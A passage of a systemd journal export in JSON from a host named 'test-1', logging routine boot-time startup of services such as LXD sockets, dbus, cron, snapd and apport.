"_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 12: fd: 18: unified" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fd;b=e2b08827b5804427b422c10c84f1567e;m=2a60c68;t=5bd16df698bcf;x=1cb1f21d0102939d", "__REALTIME_TIMESTAMP" : "1615280818719695", "__MONOTONIC_TIMESTAMP" : "44436584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - unix socket.", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817978451" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fe;b=e2b08827b5804427b422c10c84f1567e;m=2a60cc8;t=5bd16df698c2f;x=fdfd154cd83f54ad", "__REALTIME_TIMESTAMP" : "1615280818719791", "__MONOTONIC_TIMESTAMP" : "44436680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "accounts-daemon", "SYSLOG_PID" : "786", "MESSAGE" : "started daemon version 0.6.45", "_PID" : "786", "_COMM" : "accounts-daemon", "_EXE" : "/usr/lib/accountsservice/accounts-daemon", "_CMDLINE" : "/usr/lib/accountsservice/accounts-daemon", "_SYSTEMD_CGROUP" : "/system.slice/accounts-daemon.service", "_SYSTEMD_UNIT" : "accounts-daemon.service", "_SYSTEMD_INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818556640" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ff;b=e2b08827b5804427b422c10c84f1567e;m=2a60eb8;t=5bd16df698e1f;x=4332bec02ad001a9", "__REALTIME_TIMESTAMP" : "1615280818720287", "__MONOTONIC_TIMESTAMP" : "44437176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily Cleanup of 
Temporary Directories.", "UNIT" : "systemd-tmpfiles-clean.timer", "INVOCATION_ID" : "9700b3e9c7e94c8bbb5cb5eadd31c9ac", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817983403" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=300;b=e2b08827b5804427b422c10c84f1567e;m=2a60f56;t=5bd16df698ebe;x=2a7e2d8853f693cb", "__REALTIME_TIMESTAMP" : "1615280818720446", "__MONOTONIC_TIMESTAMP" : "44437334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.hostname1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634485" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=301;b=e2b08827b5804427b422c10c84f1567e;m=2a610a1;t=5bd16df699009;x=34d30000e7628ab", "__REALTIME_TIMESTAMP" : "1615280818720777", "__MONOTONIC_TIMESTAMP" : "44437665", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : 
"../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on Open-iSCSI iscsid Socket.", "UNIT" : "iscsid.socket", "INVOCATION_ID" : "1eb0ced481574b02b745ff2eadecc1bc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817988812" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=302;b=e2b08827b5804427b422c10c84f1567e;m=2a6146e;t=5bd16df6993d5;x=9f850fb4e837414a", "__REALTIME_TIMESTAMP" : "1615280818721749", "__MONOTONIC_TIMESTAMP" : "44438638", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Discard unused blocks once a week.", "UNIT" : "fstrim.timer", "INVOCATION_ID" : "1d95b26b3cca4090b62056f0aa0ddd31", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817995335" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=303;b=e2b08827b5804427b422c10c84f1567e;m=2a61590;t=5bd16df6994f8;x=ea068fc4350924ac", "__REALTIME_TIMESTAMP" : "1615280818722040", "__MONOTONIC_TIMESTAMP" : "44438928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", 
"_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Timers.", "UNIT" : "timers.target", "INVOCATION_ID" : "ccb21092f05e4b53901c1b69f443bc17", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818001033" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=304;b=e2b08827b5804427b422c10c84f1567e;m=2a6193f;t=5bd16df6998a6;x=1e56ba1aa417b00e", "__REALTIME_TIMESTAMP" : "1615280818722982", "__MONOTONIC_TIMESTAMP" : "44439871", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started ACPI Events Check.", "UNIT" : "acpid.path", "INVOCATION_ID" : "acbb7e4d2bbf44f59c42342ed64de95e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818006228" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=305;b=e2b08827b5804427b422c10c84f1567e;m=2a61f82;t=5bd16df699ee9;x=263882fa93cf9e82", "__REALTIME_TIMESTAMP" : "1615280818724585", "__MONOTONIC_TIMESTAMP" : "44441474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "UNIT" : "paths.target", "INVOCATION_ID" : "611ff12fe3034976a9758296c68836c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818008176" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=306;b=e2b08827b5804427b422c10c84f1567e;m=2a620bf;t=5bd16df69a026;x=112078bc5e9c2d29", "__REALTIME_TIMESTAMP" : "1615280818724902", "__MONOTONIC_TIMESTAMP" : "44441791", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on ACPID Listen Socket.", "UNIT" : "acpid.socket", "INVOCATION_ID" : "d144781f5fc04753bab3d0ab003bc3b1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818010071" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=307;b=e2b08827b5804427b422c10c84f1567e;m=2a621ea;t=5bd16df69a151;x=2c6f3fd245ed1a90", "__REALTIME_TIMESTAMP" : "1615280818725201", "__MONOTONIC_TIMESTAMP" : "44442090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "MESSAGE" : "Started Availability of block devices.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818018341" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=308;b=e2b08827b5804427b422c10c84f1567e;m=2a6234f;t=5bd16df69a2b7;x=12dd4932c964faba", "__REALTIME_TIMESTAMP" : "1615280818725559", "__MONOTONIC_TIMESTAMP" : "44442447", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "MESSAGE" : "Listening on Socket activation for snappy daemon.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818023733" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=309;b=e2b08827b5804427b422c10c84f1567e;m=2a62561;t=5bd16df69a4c9;x=e23bc822a4dc114a", "__REALTIME_TIMESTAMP" : "1615280818726089", "__MONOTONIC_TIMESTAMP" : "44442977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "MESSAGE" : "Listening on LXD - unix socket.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818026729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30a;b=e2b08827b5804427b422c10c84f1567e;m=2a625c9;t=5bd16df69a530;x=fa87a3ac4fd2d1ff", "__REALTIME_TIMESTAMP" : "1615280818726192", "__MONOTONIC_TIMESTAMP" : "44443081", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" 
: "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "UNIT" : "sockets.target", "INVOCATION_ID" : "07a9deddd9d140e1853a06c0058677c3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818034574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30b;b=e2b08827b5804427b422c10c84f1567e;m=2a6261a;t=5bd16df69a582;x=961e7e7821c825db", "__REALTIME_TIMESTAMP" : "1615280818726274", "__MONOTONIC_TIMESTAMP" : "44443162", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "UNIT" : "basic.target", "INVOCATION_ID" : "d287654c12884bad9dbb0b0de0e108f6", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818042137" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30c;b=e2b08827b5804427b422c10c84f1567e;m=2a62688;t=5bd16df69a5f0;x=3dcf5fd1dcd7fd00", "__REALTIME_TIMESTAMP" : "1615280818726384", "__MONOTONIC_TIMESTAMP" : "44443272", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", 
"_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - container startup/shutdown...", "UNIT" : "lxd-containers.service", "INVOCATION_ID" : "69bb4a33e4a84106a814b4eb83881d94", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818047751" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30d;b=e2b08827b5804427b422c10c84f1567e;m=2a6290b;t=5bd16df69a873;x=d26f496ee754c981", "__REALTIME_TIMESTAMP" : "1615280818727027", "__MONOTONIC_TIMESTAMP" : "44443915", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Deferred execution scheduler.", "UNIT" : "atd.service", "INVOCATION_ID" : "1ebd91a7fefa4e53858a79ee62b15641", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818055768" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30e;b=e2b08827b5804427b422c10c84f1567e;m=2a62999;t=5bd16df69a901;x=bbd8fd3e43d9c647", "__REALTIME_TIMESTAMP" : "1615280818727169", 
"__MONOTONIC_TIMESTAMP" : "44444057", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Regular background program processing daemon.", "UNIT" : "cron.service", "INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818064486" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=30f;b=e2b08827b5804427b422c10c84f1567e;m=2a629ee;t=5bd16df69a956;x=bfda37168b7b7553", "__REALTIME_TIMESTAMP" : "1615280818727254", "__MONOTONIC_TIMESTAMP" : "44444142", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Dispatcher daemon for systemd-networkd...", "UNIT" : "networkd-dispatcher.service", "INVOCATION_ID" : 
"83ebf910c7064affa22dd95766ea1937", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818074184" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=310;b=e2b08827b5804427b422c10c84f1567e;m=2a62a97;t=5bd16df69a9fe;x=449072b715fc5dc7", "__REALTIME_TIMESTAMP" : "1615280818727422", "__MONOTONIC_TIMESTAMP" : "44444311", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LSB: automatic crash report generation...", "UNIT" : "apport.service", "INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818083002" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=311;b=e2b08827b5804427b422c10c84f1567e;m=2a62b02;t=5bd16df69aa6a;x=54556e10ba188efd", "__REALTIME_TIMESTAMP" : "1615280818727530", "__MONOTONIC_TIMESTAMP" : "44444418", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
